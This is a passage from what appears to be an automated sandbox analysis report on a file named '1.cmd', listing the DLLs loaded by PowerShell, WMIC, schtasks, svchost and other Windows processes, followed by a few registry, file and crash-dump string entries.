Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 1.cmd Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Data.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Core.pdbSystem.Transactions.ni.dlliy source: WER643A.tmp.dmp.27.dr
Source: Binary string: System.pdbMZ@ source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Numerics.pdbp source: WER8767.tmp.dmp.10.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdbp source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.Drawing.ni.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000030.00000002.2998382986.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531371403.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER8767.tmp.dmp.10.dr, WER643A.tmp.dmp.27.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000030.00000002.2993093539.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000030.00000000.2531084771.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
